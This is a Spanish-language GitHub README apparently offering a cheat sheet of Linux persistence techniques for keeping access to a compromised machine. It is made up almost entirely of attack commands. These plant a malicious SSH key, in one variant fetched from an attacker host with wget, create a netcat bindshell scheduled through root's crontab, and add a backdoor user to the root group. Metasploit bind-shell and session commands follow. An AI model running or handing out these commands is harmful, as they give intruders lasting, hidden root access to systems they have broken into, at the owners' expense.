Skip to content

TheRealCiscoo/LinuxPersistence

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 

Repository files navigation

Obteniendo Persistencia en Linux

Malicious SSH Key [ con credenciales ]

Generación de par de claves

ssh-keygen -t rsa -b 4096

# En caso de que se solicite una contraseña tenemos la opción de dejarlo en blanco

Tranferencia de la clave pública al usuario comprometido

ssh-copy-id <victim-user>@<target-ip-or-hostname>

# Se solicitará la contraseña del usuario

Conexión con SSH

ssh <victim-user>@<target-ip-or-hostname>

Malicious SSH Key [ sin credenciales ]

Generación de par de claves

ssh-keygen -t rsa -b 4096

# En caso de que se solicite una contraseña tenemos la opción de dejarlo en blanco

Inicialización de servidor Python

cd ~/.ssh/

python3 -m http.server 80

# Alternativa con Python2.7
python2 -m SimpleHTTPServer 80

Descargar archivo [ máquina atacante ]

wget http://<attacker-ip>/id_rsa.pub

cat id_rsa.pub >> .ssh/authorized_keys

Malicious Crontab

Creación de bindshell

echo 'nc -lkvnp 4443 -e /bin/bash >/dev/null &' > /tmp/bindshell

Creación de crontab maliciosa

echo '     /tmp/bindshell' | sudo tee -a /var/spool/cron/crontabs/root

New User

Creación de nuevo usuario

adduser -m user -s /bin/bash ftp

Cambio de contraseña

passwd ftp

Agregar el usuario a grupo root

usermod -aG root ftp

Extra

Obteniendo conexión con Bindshell

use payload/generic/shell_bind_tcp

set RHOST <target-ip>

set LPORT <local-port>

exploit

Obteniendo conexión con Bindshell

# CTRL + Z o escribe 'background' para poner la sesión previamente obtenida en segundo plano

sessions -l

sessions -u <session-id>

sessions <session-id>

About

Técnicas para ganar persistencia en Linux

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published